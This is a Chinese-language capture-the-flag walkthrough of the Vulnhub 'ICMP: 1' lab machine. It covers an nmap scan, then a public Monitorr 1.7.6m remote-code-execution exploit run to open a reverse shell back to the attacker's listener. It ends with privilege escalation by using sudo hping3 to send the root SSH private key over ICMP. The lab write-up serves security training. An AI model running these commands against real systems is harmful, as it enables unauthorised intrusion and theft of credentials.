Vulnhub: ICMP: 1靶机

发布时间 2023-08-21 18:08:42作者: ctostm

kali:192.168.111.111

靶机:192.168.111.208

信息收集

端口扫描

nmap -A -sC -v -sV -T5 -p- --script=http-enum 192.168.111.208

image

80端口的cms为Monitorr 1.7.6m

image

搜索发现该版本的cms存在远程代码执行

searchsploit monitorr

image

漏洞利用

nc本地监听,再执行exp

python3 48980.py http://192.168.111.208/mon/ 192.168.111.111 4444

image

提权

在fox用户家目录查看reminder提示crypt.php

image

crypt.phpdevel目录中

image

BUHNIJMONIBUVCYTTYVGBUHJNI为fox用户的密码

image

fox用户sudo权限

image

开启两个终端连接目标ssh,利用hping3读取root用户的私钥文件

image

image

#发送端
sudo -u root hping3 --icmp 127.0.0.1 --data 5000 --sign signature --file /root/.ssh/id_rsa

#接收端
sudo -u root hping3 --icmp 127.0.0.1 --listen signature --safe

image

读取到的私钥保存到本地,再利用私钥登录root

image